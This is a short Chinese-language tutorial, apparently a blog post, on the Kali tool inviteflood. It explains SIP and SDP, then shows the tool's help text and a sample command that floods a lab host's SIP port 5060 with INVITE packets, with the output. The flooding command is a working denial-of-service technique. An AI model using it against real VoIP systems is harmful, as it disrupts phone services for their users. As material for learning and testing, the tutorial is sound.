inviteflood -SIP/SDP 泛洪攻击

0x00前言

会话发起协议（Session Initiation Protocol，缩写SIP）

会话描述协议（Session Description Protocol或简写SDP）描述的是流媒体的初始化参数。

SIP与H.323一样，是用于VoIP最主要的信令协议之一。SIP最初由IETF标准化和管理，而H.323VoIP协议则从传统上与ITU有着更多的联系。

SIP的设计目标之一是提供类似公用交换电话网（PSTN）中呼叫处理功能的扩展集。在这个扩展集中，实现类似日常电话的操作：拨号，振铃，回铃音或者忙音，只是实现方式和术语有所不同。

SIP也实现了许多七号信令系统(SS7)中更高级的呼叫处理功能，尽管这两个协议相差很远。SS7是一个高度集中处理的协议，其特点表现为高复杂度的中心网络结构和无智能的哑终端(传统的电话机)。SIP则是一个点对点协议，所以它只需要一个相对简单的(因此也高度可扩展的)核心网络，而将处理工作下放给连接在网络边缘的智能端点(装有硬件或软件的终端设备)。SIP的许多功能在端点中实现，这与传统的SS7将其在网络核心设备实现的作法大异其趣。

SIP同HTTP相似并采用了后者的一些设计原则：SIP报文是人类可读的，并且也是采取请求-应答的流程。SIP借用了许多HTTP状态码，如常见的'404 not found'。

SDP用于和RTSP以及SIP协同工作，也可被单独用来描述多播会话。

0x01 简介

  通过TCP/UDP进行泛洪攻击的SIP/SDP会话，该工具可以在本i机产生大量的流量，因为需要在本地读取数据进行对外发送。所以在流量监控时可能会产生40M/s的速度。

使用帮助

root@kali:~# inviteflood -h

inviteflood - Version 2.0

              June 09, 2006

 Usage:

 Mandatory -

    interface (e.g. eth0)

    target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")

    target domain (e.g. enterprise.com or an IPv4 address)

    IPv4 addr of flood target (ddd.ddd.ddd.ddd)

    flood stage (i.e. number of packets)

 Optional -

    -a flood tool "From:" alias (e.g. jane.doe)

    -i IPv4 source IP address [default is IP address of interface]

    -S srcPort  (0 - 65535) [default is well-known discard port 9]

    -D destPort (0 - 65535) [default is well-known SIP port 5060]

    -l lineString line used by SNOM [default is blank]

    -s sleep time btwn INVITE msgs (usec)

    -h help - print this usage

    -v verbose output mode

0x02 使用示例

使用接口eth0 并且提供5000用户,使用100个包向目标域名(example.local) 和泛洪主机(192.168.1.5) 进行泛洪攻击。

root@kali:~# inviteflood eth0 5000 example.local 192.168.1.5 100

inviteflood - Version 2.0

              June 09, 2006

source IPv4 addr:port   = 192.168.1.202:9

dest   IPv4 addr:port   = 192.168.1.5:5060

targeted UA             = 5000@192.168.1.1

Flooding destination with 100 packets

sent: 100

欢迎大家分享更好的思路，热切期待^^_^^ !!！